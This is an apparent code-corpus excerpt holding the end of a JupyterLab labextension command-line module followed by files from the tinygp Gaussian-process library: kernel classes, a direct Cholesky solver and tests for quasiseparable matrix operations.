--py myextensionPyPackage This uninstalls a labextension. """ examples = """ jupyter labextension uninstall myextension jupyter labextension uninstall --py myextensionPyPackage """ aliases = { "prefix" : "UninstallLabExtensionApp.prefix", "labextensions" : "UninstallLabExtensionApp.labextensions_dir", "name": "UninstallLabExtensionApp.name", } prefix = Unicode('', config=True, help="Installation prefix") labextensions_dir = Unicode('', config=True, help="Full path to labextensions dir (probably use prefix or user)") name = Unicode('', config=True, help="The name of the extension.") def _config_file_name_default(self): """The default config file name.""" return 'jupyterlab_config' def uninstall_extensions(self): """Uninstall some labextensions""" kwargs = { 'user': self.user, 'sys_prefix': self.sys_prefix, 'prefix': self.prefix, 'labextensions_dir': self.labextensions_dir, 'logger': self.log } arg_count = 1 if len(self.extra_args) > arg_count: raise ValueError("only one labextension allowed at a time. Call multiple times to uninstall multiple extensions.") if len(self.extra_args) < arg_count: raise ValueError("not enough arguments") if self.python: uninstall_labextension_python(self.extra_args[0], **kwargs) else: uninstall_labextension(self.extra_args[0], **kwargs) def start(self): if not self.extra_args: sys.exit('Please specify a labextension to uninstall') else: try: self.uninstall_extensions() except ArgumentConflict as e: sys.exit(str(e)) class ToggleLabExtensionApp(BaseLabExtensionApp): """A base class for apps that enable/disable extensions""" name = "jupyter labextension enable/disable" version = __version__ description = "Enable/disable a labextension in configuration." user = Bool(True, config=True, help="Apply the configuration only for the current user (default)") _toggle_value = None def _config_file_name_default(self): """The default config file name.""" return 'jupyterlab_config' def toggle_labextension_python(self, module): """Toggle some extensions in an importable Python module. Returns a list of booleans indicating whether the state was changed as requested. Parameters ---------- module : str Importable Python module exposing the magic-named `_jupyter_labextension_paths` function """ toggle = (enable_labextension_python if self._toggle_value else disable_labextension_python) return toggle(module, user=self.user, sys_prefix=self.sys_prefix, logger=self.log) def toggle_labextension(self, name): """Toggle some a named labextension by require-able AMD module. Returns whether the state was changed as requested. Parameters ---------- require : str require.js path used to load the labextension """ toggle = (enable_labextension if self._toggle_value else disable_labextension) return toggle(name, user=self.user, sys_prefix=self.sys_prefix, logger=self.log) def start(self): if not self.extra_args: sys.exit('Please specify a labextension/package to enable or disable') elif len(self.extra_args) > 1: sys.exit('Please specify one labextension/package at a time') if self.python: self.toggle_labextension_python(self.extra_args[0]) else: self.toggle_labextension(self.extra_args[0]) class EnableLabExtensionApp(ToggleLabExtensionApp): """An App that enables labextensions""" name = "jupyter labextension enable" description = """ Enable a labextension in frontend configuration. Usage jupyter labextension enable myextension [--system|--sys-prefix] """ _toggle_value = True class DisableLabExtensionApp(ToggleLabExtensionApp): """An App that disables labextensions""" name = "jupyter labextension disable" description = """ Enable a labextension in frontend configuration. Usage jupyter labextension disable myextension [--system|--sys-prefix] """ _toggle_value = None class ListLabExtensionsApp(BaseLabExtensionApp): """An App that lists and validates labextensions""" name = "jupyter labextension list" version = __version__ description = "List all labextensions known by the configuration system" def list_labextensions(self): """List all the labextensions""" config_dirs = [os.path.join(p, 'labconfig') for p in jupyter_config_path()] print("Known labextensions:") for config_dir in config_dirs: cm = BaseJSONConfigManager(parent=self, config_dir=config_dir) data = cm.get("jupyterlab_config") labextensions = ( data.setdefault("LabApp", {}) .setdefault("labextensions", {}) ) if labextensions: print(u'config dir: {}'.format(config_dir)) for name, enabled in labextensions.items(): print(u' {} {}'.format( name, GREEN_ENABLED if enabled else RED_DISABLED)) validate_labextension(name, self.log) def start(self): """Perform the App's functions as configured""" self.list_labextensions() _examples = """ jupyter labextension list # list all configured labextensions jupyter labextension install --py <packagename> # install a labextension from a Python package jupyter labextension enable --py <packagename> # enable all labextensions in a Python package jupyter labextension disable --py <packagename> # disable all labextensions in a Python package jupyter labextension uninstall --py <packagename> # uninstall a labextension in a Python package """ class LabExtensionApp(BaseLabExtensionApp): """Base jupyter labextension command entry point""" name = "jupyter labextension" version = __version__ description = "Work with JupyterLab extensions" examples = _examples subcommands = dict( install=(InstallLabExtensionApp, "Install a labextension"), enable=(EnableLabExtensionApp, "Enable a labextension"), disable=(DisableLabExtensionApp, "Disable a labextension"), uninstall=(UninstallLabExtensionApp, "Uninstall a labextension"), list=(ListLabExtensionsApp, "List labextensions") ) def start(self): """Perform the App's functions as configured""" super(LabExtensionApp, self).start() # The above should have called a subcommand and raised NoStart; if we # get here, it didn't, so we should self.log.info a message. subcmds = ", ".join(sorted(self.subcommands)) sys.exit("Please supply at least one subcommand: %s" % subcmds) main = LabExtensionApp.launch_instance #------------------------------------------------------------------------------ # Private API #------------------------------------------------------------------------------ def _should_copy(src, dest, logger=None): """Should a file be copied, if it doesn't exist, or is newer? Returns whether the file needs to be updated. Parameters ---------- src : string A path that should exist from which to copy a file src : string A path that might exist to which to copy a file logger : Jupyter logger [optional] Logger instance to use """ if not os.path.exists(dest): return True if os.stat(src).st_mtime - os.stat(dest).st_mtime > 1e-6: # we add a fudge factor to work around a bug in python 2.x # that was fixed in python 3.x: http://bugs.python.org/issue12904 if logger: logger.warn("Out of date: %s" % dest) return True if logger: logger.info("Up to date: %s" % dest) return False def _maybe_copy(src, dest, logger=None): """Copy a file if it needs updating. Parameters ---------- src : string A path that should exist from which to copy a file src : string A path that might exist to which to copy a file logger : Jupyter logger [optional] Logger instance to use """ if _should_copy(src, dest, logger=logger): if logger: logger.info("Copying: %s -> %s" % (src, dest)) shutil.copy2(src, dest) def _safe_is_tarfile(path): """Safe version of is_tarfile, return False on IOError. Returns whether the file exists and is a tarfile. Parameters ---------- path : string A path that might not exist and or be a tarfile """ try: return tarfile.is_tarfile(path) except IOError: return False def _get_labextension_dir(user=False, sys_prefix=False, prefix=None, labextensions_dir=None): """Return the labextension directory specified Parameters ---------- user : bool [default: False] Get the user's .jupyter/labextensions directory sys_prefix : bool [default: False] Get sys.prefix, i.e. ~/.envs/my-env/share/jupyter/labextensions prefix : str [optional] Get custom prefix labextensions_dir : str [optional] Get what you put in """ if sum(map(bool, [user, prefix, labextensions_dir, sys_prefix])) > 1: raise ArgumentConflict("cannot specify more than one of user, sys_prefix, prefix, or labextensions_dir") if user: labext = pjoin(jupyter_data_dir(), u'labextensions') elif sys_prefix: labext = pjoin(ENV_JUPYTER_PATH[0], u'labextensions') elif prefix: labext = pjoin(prefix, 'share', 'jupyter', 'labextensions') elif labextensions_dir: labext = labextensions_dir else: labext = pjoin(SYSTEM_JUPYTER_PATH[0], 'labextensions') return labext def _labextension_dirs(): """The possible locations of labextensions. Returns a list of known base extension locations """ return [ pjoin(jupyter_data_dir(), u'labextensions'), pjoin(ENV_JUPYTER_PATH[0], u'labextensions'), pjoin(SYSTEM_JUPYTER_PATH[0], 'labextensions') ] def _get_config_dir(user=False, sys_prefix=False): """Get the location of config files for the current context Returns the string to the enviornment Parameters ---------- user : bool [default: False] Get the user's .jupyter config directory sys_prefix : bool [default: False] Get sys.prefix, i.e. ~/.envs/my-env/etc/jupyter """ user = False if sys_prefix else user if user and sys_prefix: raise ArgumentConflict("Cannot specify more than one of user or sys_prefix") if user: labext = jupyter_config_dir() elif sys_prefix: labext = ENV_CONFIG_PATH[0] else: labext = SYSTEM_CONFIG_PATH[0] return labext def _get_labextension_metadata(module): """Get the list of labextension paths associated with a Python module. Returns a tuple of (the module, [{ 'name': 'mockextension', 'src': 'static', }]) Parameters ---------- module : str Importable Python module exposing the magic-named `_jupyter_labextension_paths` function """ m = import_item(module) if not hasattr(m, '_jupyter_labextension_paths'): raise KeyError('The Python module {} is not a valid labextension'.format(module)) labexts = m._jupyter_labextension_paths() return m, labexts def _read_config_data(user=False, sys_prefix=False): """Get the config for the current context Returns the string to the enviornment Parameters ---------- user : bool [default: False] Get the user's .jupyter config directory sys_prefix : bool [default: False] Get sys.prefix, i.e. ~/.envs/my-env/etc/jupyter """ config_dir = _get_config_dir(user=user, sys_prefix=sys_prefix) config_man = BaseJSONConfigManager(config_dir=config_dir) return config_man.get('jupyterlab_config') def _write_config_data(data, user=False, sys_prefix=False): """Update the config for the current context Parameters ---------- data : object An object which can be accepted by ConfigManager.update user : bool [default: False] Get the user's .jupyter config directory sys_prefix : bool [default: False] Get sys.prefix, i.e. ~/.envs/my-env/etc/jupyter """ config_dir = _get_config_dir(user=user, sys_prefix=sys_prefix) config_man = BaseJSONConfigManager(config_dir=config_dir) config_man.update('jupyterlab_config', data) if __name__ == '__main__': main() ```
{ "source": "0x0L/tinygp", "score": 3 }
#### File: tinygp/kernels/base.py ```python from __future__ import annotations __all__ = [ "Kernel", "Conditioned", "Custom", "Sum", "Product", "Constant", "DotProduct", "Polynomial", ] from abc import ABCMeta, abstractmethod from typing import TYPE_CHECKING, Any, Callable, Optional, Sequence, Union import jax import jax.numpy as jnp from tinygp.helpers import JAXArray, dataclass if TYPE_CHECKING: from tinygp.solvers.solver import Solver Axis = Union[int, Sequence[int]] class Kernel(metaclass=ABCMeta): """The base class for all kernel implementations This subclass provides default implementations to add and multiply kernels. Subclasses should accept parameters in their ``__init__`` and then override :func:`Kernel.evaluate` with custom behavior. """ if TYPE_CHECKING: def __init__(self, *args: Any, **kwargs: Any) -> None: pass @abstractmethod def evaluate(self, X1: JAXArray, X2: JAXArray) -> JAXArray: """Evaluate the kernel at a pair of input coordinates This should be overridden be subclasses to return the kernel-specific value. Two things to note: 1. Users shouldn't generally call :func:`Kernel.evaluate`. Instead, always "call" the kernel instance directly; for example, you can evaluate the Matern-3/2 kernel using ``Matern32(1.5)(x1, x2)``, for arrays of input coordinates ``x1`` and ``x2``. 2. When implementing a custom kernel, this method should treat ``X1`` and ``X2`` as single datapoints. In other words, these inputs will typically either be scalars of have shape ``n_dim``, where ``n_dim`` is the number of input dimensions, rather than ``n_data`` or ``(n_data, n_dim)``, and you should let the :class:`Kernel` ``vmap`` magic handle all the broadcasting for you. """ raise NotImplementedError def evaluate_diag(self, X: JAXArray) -> JAXArray: """Evaluate the kernel on its diagonal The default implementation simply calls :func:`Kernel.evaluate` with ``X`` as both arguments, but subclasses can use this to make diagonal calcuations more efficient. """ return self.evaluate(X, X) def matmul( self, X1: JAXArray, X2: Optional[JAXArray] = None, y: Optional[JAXArray] = None, ) -> JAXArray: if y is None: assert X2 is not None y = X2 X2 = None if X2 is None: X2 = X1 return jnp.dot(self(X1, X2), y) def __call__( self, X1: JAXArray, X2: Optional[JAXArray] = None ) -> JAXArray: if X2 is None: k = jax.vmap(self.evaluate_diag, in_axes=0)(X1) if k.ndim != 1: raise ValueError( "Invalid kernel diagonal shape: " f"expected ndim = 1, got ndim={k.ndim} " "check the dimensions of parameters and custom kernels" ) return k k = jax.vmap( jax.vmap(self.evaluate, in_axes=(None, 0)), in_axes=(0, None) )(X1, X2) if k.ndim != 2: raise ValueError( "Invalid kernel shape: " f"expected ndim = 2, got ndim={k.ndim} " "check the dimensions of parameters and custom kernels" ) return k def __add__(self, other: Union["Kernel", JAXArray]) -> "Kernel": if isinstance(other, Kernel): return Sum(self, other) return Sum(self, Constant(other)) def __radd__(self, other: Union["Kernel", JAXArray]) -> "Kernel": if isinstance(other, Kernel): return Sum(other, self) return Sum(Constant(other), self) def __mul__(self, other: Union["Kernel", JAXArray]) -> "Kernel": if isinstance(other, Kernel): return Product(self, other) return Product(self, Constant(other)) def __rmul__(self, other: Union["Kernel", JAXArray]) -> "Kernel": if isinstance(other, Kernel): return Product(other, self) return Product(Constant(other), self) @dataclass class Conditioned(Kernel): """A kernel used when conditioning a process on data Args: X: The coordinates of the data. scale_tril: The lower Cholesky factor of the base process' kernel matrix. kernel: The predictive kerenl; this will generally be the kernel from the kernel used by the original process. """ X: JAXArray solver: Solver kernel: Kernel def evaluate(self, X1: JAXArray, X2: JAXArray) -> JAXArray: kernel_vec = jax.vmap(self.kernel.evaluate, in_axes=(0, None)) K1 = self.solver.solve_triangular(kernel_vec(self.X, X1)) K2 = self.solver.solve_triangular(kernel_vec(self.X, X2)) return self.kernel.evaluate(X1, X2) - K1.transpose() @ K2 def evaluate_diag(self, X: JAXArray) -> JAXArray: kernel_vec = jax.vmap(self.kernel.evaluate, in_axes=(0, None)) K = self.solver.solve_triangular(kernel_vec(self.X, X)) return self.kernel.evaluate_diag(X) - K.transpose() @ K @dataclass class Custom(Kernel): """A custom kernel class implemented as a callable Args: function: A callable with a signature and behavior that matches :func:`Kernel.evaluate`. """ function: Callable[[Any, Any], Any] def evaluate(self, X1: JAXArray, X2: JAXArray) -> JAXArray: return self.function(X1, X2) # type: ignore @dataclass class Sum(Kernel): """A helper to represent the sum of two kernels""" kernel1: Kernel kernel2: Kernel def evaluate(self, X1: JAXArray, X2: JAXArray) -> JAXArray: return self.kernel1.evaluate(X1, X2) + self.kernel2.evaluate(X1, X2) @dataclass class Product(Kernel): """A helper to represent the product of two kernels""" kernel1: Kernel kernel2: Kernel def evaluate(self, X1: JAXArray, X2: JAXArray) -> JAXArray: return self.kernel1.evaluate(X1, X2) * self.kernel2.evaluate(X1, X2) @dataclass class Constant(Kernel): r"""This kernel returns the constant .. math:: k(\mathbf{x}_i,\,\mathbf{x}_j) = c where :math:`c` is a parameter. Args: c: The parameter :math:`c` in the above equation. """ value: JAXArray def __post_init__(self) -> None: if jnp.ndim(self.value) != 0: raise ValueError("The value of a constant kernel must be a scalar") def evaluate(self, X1: JAXArray, X2: JAXArray) -> JAXArray: return self.value @dataclass class DotProduct(Kernel): r"""The dot product kernel .. math:: k(\mathbf{x}_i,\,\mathbf{x}_j) = \mathbf{x}_i \cdot \mathbf{x}_j with no parameters. """ def evaluate(self, X1: JAXArray, X2: JAXArray) -> JAXArray: return X1 @ X2 @dataclass class Polynomial(Kernel): r"""A polynomial kernel .. math:: k(\mathbf{x}_i,\,\mathbf{x}_j) = [(\mathbf{x}_i / \ell) \cdot (\mathbf{x}_j / \ell) + \sigma^2]^P Args: order: The power :math:`P`. scale: The parameter :math:`\ell`. sigma: The parameter :math:`\sigma`. """ order: JAXArray scale: JAXArray = jnp.ones(()) sigma: JAXArray = jnp.zeros(()) def evaluate(self, X1: JAXArray, X2: JAXArray) -> JAXArray: return ( (X1 / self.scale) @ (X2 / self.scale) + jnp.square(self.sigma) ) ** self.order ``` #### File: tinygp/solvers/direct.py ```python from __future__ import annotations __all__ = ["DirectSolver"] from typing import Any, Optional import jax.numpy as jnp import numpy as np from jax.scipy import linalg from tinygp import kernels from tinygp.helpers import JAXArray, dataclass from tinygp.solvers.solver import Solver @dataclass class DirectSolver(Solver): X: JAXArray variance_value: JAXArray covariance_value: JAXArray scale_tril: JAXArray @classmethod def init( cls, kernel: kernels.Kernel, X: JAXArray, diag: JAXArray, *, covariance: Optional[Any] = None, ) -> "DirectSolver": variance = kernel(X) + diag if covariance is None: covariance = construct_covariance(kernel, X, diag) scale_tril = linalg.cholesky(covariance, lower=True) return cls( X=X, variance_value=variance, covariance_value=covariance, scale_tril=scale_tril, ) def variance(self) -> JAXArray: return self.variance_value def covariance(self) -> JAXArray: return self.covariance_value def normalization(self) -> JAXArray: return jnp.sum( jnp.log(jnp.diag(self.scale_tril)) ) + 0.5 * self.scale_tril.shape[0] * np.log(2 * np.pi) def solve_triangular( self, y: JAXArray, *, transpose: bool = False ) -> JAXArray: if transpose: return linalg.solve_triangular( self.scale_tril, y, lower=True, trans=1 ) else: return linalg.solve_triangular(self.scale_tril, y, lower=True) def dot_triangular(self, y: JAXArray) -> JAXArray: return jnp.einsum("ij,j...->i...", self.scale_tril, y) def condition( self, kernel: kernels.Kernel, X_test: Optional[JAXArray], diag: Optional[JAXArray], ) -> Any: if X_test is None: Ks = kernel(self.X, self.X) if diag is None: Kss = Ks else: Kss = construct_covariance(kernel, self.X, diag) else: if diag is None: Kss = kernel(X_test, X_test) else: Kss = construct_covariance(kernel, X_test, diag) Ks = kernel(self.X, X_test) A = self.solve_triangular(Ks) return Kss - A.transpose() @ A def construct_covariance( kernel: kernels.Kernel, X: JAXArray, diag: JAXArray ) -> JAXArray: covariance = kernel(X, X) covariance = covariance.at[jnp.diag_indices(covariance.shape[0])].add(diag) # type: ignore return covariance ``` #### File: test_solvers/test_quasisep/test_core.py ```python from itertools import combinations import jax.numpy as jnp import numpy as np import pytest from tinygp.solvers.quasisep.core import ( DiagQSM, LowerTriQSM, SquareQSM, StrictLowerTriQSM, StrictUpperTriQSM, SymmQSM, ) @pytest.fixture(params=["random", "celerite"]) def name(request): return request.param @pytest.fixture def matrices(name): return get_matrices(name) @pytest.fixture def some_nice_matrices(): diag1, p1, q1, a1, _, _, _, _ = get_matrices("celerite") diag2, p2, q2, a2, _, _, _, _ = get_matrices("random") mat1 = LowerTriQSM( diag=DiagQSM(diag1), lower=StrictLowerTriQSM(p=p1, q=q1, a=a1), ) mat2 = SquareQSM( diag=DiagQSM(diag2), lower=StrictLowerTriQSM(p=p2, q=q2, a=a2), upper=StrictUpperTriQSM(p=p2, q=q2, a=a2), ) mat3 = SquareQSM( diag=DiagQSM(diag1), lower=StrictLowerTriQSM(p=p1, q=q1, a=a1), upper=StrictUpperTriQSM( p=jnp.zeros_like(p2), q=jnp.zeros_like(q2), a=a2 ), ) mat4 = SquareQSM( diag=DiagQSM(diag1), lower=StrictLowerTriQSM(p=p1, q=q1, a=a1), upper=StrictUpperTriQSM(p=p2, q=q2, a=a2), ) return mat1, mat2, mat3, mat4 def get_matrices(name): N = 100 random = np.random.default_rng(1234) diag = np.exp(random.normal(size=N)) if name == "random": J = 5 p = random.normal(size=(N, J)) q = random.normal(size=(N, J)) a = np.repeat(np.eye(J)[None, :, :], N, axis=0) l = np.tril(p @ q.T, -1) u = np.triu(q @ p.T, 1) diag += np.sum(p * q, axis=1) elif name == "celerite": t = np.sort(random.uniform(0, 10, N)) a = np.array([1.0, 2.5]) b = np.array([0.5, 1.5]) c = np.array([1.2, 0.5]) d = np.array([0.5, 0.1]) tau = np.abs(t[:, None] - t[None, :])[:, :, None] K = np.sum( np.exp(-c[None, None] * tau) * ( a[None, None] * np.cos(d[None, None] * tau) + b[None, None] * np.sin(d[None, None] * tau) ), axis=-1, ) K[np.diag_indices_from(K)] += diag diag = np.diag(K) l = np.tril(K, -1) u = np.triu(K, 1) cos = np.cos(d[None] * t[:, None]) sin = np.sin(d[None] * t[:, None]) p = np.concatenate( ( a[None] * cos + b[None] * sin, a[None] * sin - b[None] * cos, ), axis=1, ) q = np.concatenate((cos, sin), axis=1) c = np.append(c, c) dt = np.append(0, np.diff(t)) a = np.stack( [np.diag(v) for v in np.exp(-c[None] * dt[:, None])], axis=0 ) p = np.einsum("ni,nij->nj", p, a) else: assert False v = random.normal(size=N) m = random.normal(size=(N, 4)) return diag, p, q, a, v, m, l, u def test_quasisep_def(): random = np.random.default_rng(2022) n = 17 m1 = 3 m2 = 5 d = random.normal(size=n) p = random.normal(size=(n, m1)) q = random.normal(size=(n, m1)) a = random.normal(size=(n, m1, m1)) g = random.normal(size=(n, m2)) h = random.normal(size=(n, m2)) b = random.normal(size=(n, m2, m2)) m = SquareQSM( diag=DiagQSM(d=d), lower=StrictLowerTriQSM(p=p, q=q, a=a), upper=StrictUpperTriQSM(p=g, q=h, a=b), ).to_dense() def get_value(i, j): if i == j: return d[i] if j < i: tmp = np.copy(q[j]) for k in range(j + 1, i): tmp = a[k] @ tmp return p[i] @ tmp if j > i: tmp = np.copy(h[i]) for k in range(i + 1, j): tmp = tmp @ b[k].T return tmp @ g[j] for i in range(n): for j in range(n): np.testing.assert_allclose(get_value(i, j), m[i, j]) def test_strict_tri_matmul(matrices): _, p, q, a, v, m, l, u = matrices mat = StrictLowerTriQSM(p=p, q=q, a=a) # Check multiplication into identity / to dense np.testing.assert_allclose(mat.to_dense(), l) np.testing.assert_allclose(mat.T.to_dense(), u) # Check matvec np.testing.assert_allclose(mat @ v, l @ v) np.testing.assert_allclose(mat.T @ v, u @ v) # Check matmat np.testing.assert_allclose(mat @ m, l @ m) np.testing.assert_allclose(mat.T @ m, u @ m) def test_tri_matmul(matrices): diag, p, q, a, v, m, l, _ = matrices mat = LowerTriQSM( diag=DiagQSM(diag), lower=StrictLowerTriQSM(p=p, q=q, a=a) ) dense = l + np.diag(diag) # Check multiplication into identity / to dense np.testing.assert_allclose(mat.to_dense(), dense) np.testing.assert_allclose(mat.T.to_dense(), dense.T) # Check matvec np.testing.assert_allclose(mat @ v, dense @ v) np.testing.assert_allclose(mat.T @ v, dense.T @ v) # Check matmat np.testing.assert_allclose(mat @ m, dense @ m) np.testing.assert_allclose(mat.T @ m, dense.T @ m) @pytest.mark.parametrize("symm", [True, False]) def test_square_matmul(symm, matrices): diag, p, q, a, v, m, l, u = matrices if symm: mat = SymmQSM( diag=DiagQSM(diag), lower=StrictLowerTriQSM(p=p, q=q, a=a) ) else: mat = SquareQSM( diag=DiagQSM(diag), lower=StrictLowerTriQSM(p=p, q=q, a=a), upper=StrictUpperTriQSM(p=p, q=q, a=a), ) # Create and double check the dense reconstruction dense = mat.to_dense() np.testing.assert_allclose(np.tril(dense, -1), l) np.testing.assert_allclose(np.triu(dense, 1), u) np.testing.assert_allclose(np.diag(dense), diag) # Test matmuls np.testing.assert_allclose(mat @ v, dense @ v) np.testing.assert_allclose(mat @ m, dense @ m) np.testing.assert_allclose(v.T @ mat, v.T @ dense) np.testing.assert_allclose(m.T @ mat, m.T @ dense) @pytest.mark.parametrize("name", ["celerite"]) def test_tri_inv(matrices): diag, p, q, a, _, _, _, _ = matrices mat = LowerTriQSM( diag=DiagQSM(diag), lower=StrictLowerTriQSM(p=p, q=q, a=a) ) dense = mat.to_dense() minv = mat.inv() np.testing.assert_allclose(minv.to_dense(), jnp.linalg.inv(dense)) np.testing.assert_allclose( minv.matmul(dense), np.eye(len(diag)), atol=1e-12 ) @pytest.mark.parametrize("name", ["celerite"]) def test_tri_solve(matrices): diag, p, q, a, v, m, _, _ = matrices mat = LowerTriQSM( diag=DiagQSM(diag), lower=StrictLowerTriQSM(p=p, q=q, a=a) ) dense = mat.to_dense() np.testing.assert_allclose(mat.solve(v), np.linalg.solve(dense, v)) np.testing.assert_allclose(mat.solve(m), np.linalg.solve(dense, m)) np.testing.assert_allclose(mat.T.solve(v), np.linalg.solve(dense.T, v)) np.testing.assert_allclose(mat.T.solve(m), np.linalg.solve(dense.T, m)) np.testing.assert_allclose(mat.inv().solve(v), dense @ v) np.testing.assert_allclose(mat.inv().solve(m), dense @ m) np.testing.assert_allclose(mat.T.inv().solve(v), dense.T @ v) np.testing.assert_allclose(mat.T.inv().solve(m), dense.T @ m) @pytest.mark.parametrize("symm", [True, False]) def test_square_inv(symm, matrices): diag, p, q, a, _, _, l, u = matrices if symm: mat = SymmQSM( diag=DiagQSM(diag), lower=StrictLowerTriQSM(p=p, q=q, a=a) ) else: mat = SquareQSM( diag=DiagQSM(diag), lower=StrictLowerTriQSM(p=p, q=q, a=a), upper=StrictUpperTriQSM(p=p, q=q, a=a), ) # Create and double check the dense reconstruction dense = mat.to_dense() np.testing.assert_allclose(np.tril(dense, -1), l) np.testing.assert_allclose(np.triu(dense, 1), u) np.testing.assert_allclose(np.diag(dense), diag) # Invert the QS matrix minv = mat.inv() np.testing.assert_allclose( minv.to_dense(), jnp.linalg.inv(dense), rtol=2e-6 ) np.testing.assert_allclose( minv.matmul(dense), np.eye(len(diag)), atol=1e-12 ) # In this case, we know our matrix to be symmetric - so should its inverse be! # This may change in the future as we expand test cases if not symm: np.testing.assert_allclose(minv.lower.p, minv.upper.p) np.testing.assert_allclose(minv.lower.q, minv.upper.q) np.testing.assert_allclose(minv.lower.a, minv.upper.a) # The inverse of the inverse should be itself... don't actually do this! # Note: we can't actually directly compare the generators because there's # enough degrees of freedom that they won't necessarily round trip. It's # good enough to check that it produces the correct dense reconstruction. mat2 = minv.inv() np.testing.assert_allclose(mat2.to_dense(), dense, rtol=1e-4) def test_gram(matrices): diag, p, q, a, _, _, _, _ = matrices mat = SquareQSM( diag=DiagQSM(diag), lower=StrictLowerTriQSM(p=p, q=q, a=a), upper=StrictUpperTriQSM(p=p, q=q, a=a), ) dense = mat.to_dense() np.testing.assert_allclose(mat.gram().to_dense(), dense.T @ dense) mat = mat.inv() dense = mat.to_dense() np.testing.assert_allclose(mat.gram().to_dense(), dense.T @ dense) mat = SquareQSM( diag=DiagQSM(diag), lower=StrictLowerTriQSM(p=p, q=q, a=a), upper=StrictUpperTriQSM( p=jnp.zeros_like(p), q=jnp.zeros_like(q), a=jnp.zeros_like(a) ), ) dense = mat.to_dense() np.testing.assert_allclose(mat.gram().to_dense(), dense.T @ dense) @pytest.mark.parametrize("name", ["celerite"]) def test_cholesky(matrices): diag, p, q, a, v, m, _, _ = matrices mat = SymmQSM(diag=DiagQSM(diag), lower=StrictLowerTriQSM(p=p, q=q, a=a)) dense = mat.to_dense() chol = mat.cholesky() np.testing.assert_allclose(chol.to_dense(), np.linalg.cholesky(dense)) mat = mat.inv() dense = mat.to_dense() chol = mat.cholesky() np.testing.assert_allclose(chol.to_dense(), np.linalg.cholesky(dense)) np.testing.assert_allclose( chol.solve(v), np.linalg.solve(chol.to_dense(), v) ) np.testing.assert_allclose( chol.solve(m), np.linalg.solve(chol.to_dense(), m) ) def test_tri_qsmul(some_nice_matrices): mat1, mat2, mat3, mat4 = some_nice_matrices def check(mat1, mat2): mat = mat1 @ mat2 a = mat.to_dense() b = mat1.to_dense() @ mat2.to_dense() np.testing.assert_allclose(np.diag(a), np.diag(b), atol=1e-12) np.testing.assert_allclose(np.tril(a, -1), np.tril(b, -1), atol=1e-12) np.testing.assert_allclose(np.triu(a, 1), np.triu(b, 1), atol=1e-12) minv = mat1.inv() mTinv = mat1.T.inv() for m in [mat2, mat3, mat4, mat2.inv()]: check(mat1, m) check(minv, m) check(mat1.T, m) check(mTinv, m) def test_square_qsmul(some_nice_matrices): mat1, mat2, mat3, mat4 = some_nice_matrices mat1 += mat1.lower.transpose() def check(mat1, mat2): mat = mat1 @ mat2 a = mat.to_dense() b = mat1.to_dense() @ mat2.to_dense() np.testing.assert_allclose(np.diag(a), np.diag(b), atol=1e-12) np.testing.assert_allclose(np.tril(a, -1), np.tril(b, -1), atol=1e-12) np.testing.assert_allclose(np.triu(a, 1), np.triu(b, 1), atol=1e-12) for m1, m2 in combinations( [mat1, mat2, mat3, mat4, mat1.inv(), mat2.inv()], 2 ): check(m1, m2) def test_ops(some_nice_matrices): mat1, mat2, mat3, mat4 = some_nice_matrices def check(mat1, mat2): for m1, m2 in combinations([mat1, mat2, mat1.lower, mat2.lower], 2): a = m1.to_dense() b = m2.to_dense() np.testing.assert_allclose((-m1).to_dense(), -a, atol=1e-12) np.testing.assert_allclose((m1 + m2).to_dense(), a + b, atol=1e-12) np.testing.assert_allclose((m1 - m2).to_dense(), a - b, atol=1e-12) np.testing.assert_allclose((m1 * m2).to_dense(), a * b, atol=1e-12) np.testing.assert_allclose( (2.5 * m1).to_dense(), 2.5 * a, atol=1e-12 ) for m1, m2 in combinations( [mat1, mat2, mat3, mat4, mat1.inv(), mat2.inv()], 2 ): check(m1, m2) ``` #### File: test_solvers/test_quasisep/test_general.py ```python import jax import jax.numpy as jnp import numpy as np from tinygp.solvers.quasisep import kernels from tinygp.solvers.quasisep.general import GeneralQSM def test_matmul(): random = np.random.default_rng(1234) x1 = np.sort(random.uniform(0, 10, 100)) x2 = np.sort(random.uniform(2, 8, 75)) kernel = kernels.Matern52(sigma=1.5, scale=3.4) for (x1, x2) in [(x1, x2), (x1, x1), (x2, x1)]: y = np.sin(x2)[:, None] K = kernel(x1, x2) idx = jnp.searchsorted(x2, x1, side="right") - 1 a = jax.vmap(kernel.A)(np.append(x2[0], x2[:-1]), x2) ql = jax.vmap(kernel.q)(x2) pl = jax.vmap(kernel.p)(x1) qu = jax.vmap(kernel.q)(x1) pu = jax.vmap(kernel.p)(x2) i = jnp.clip(idx, 0, x2.shape[0] - 1) pl = jax.vmap(jnp.dot)(pl, jax.vmap(kernel.A)(x2[i], x1)) i = jnp.clip(idx + 1, 0, x2.shape[0] - 1) qu = jax.vmap(jnp.dot)(jax.vmap(kernel.A)(x1, x2[i]), qu) mat = GeneralQSM(pl=pl, ql=ql, pu=pu, qu=qu, a=a, idx=idx) np.testing.assert_allclose(mat.matmul(y), K @ y) ```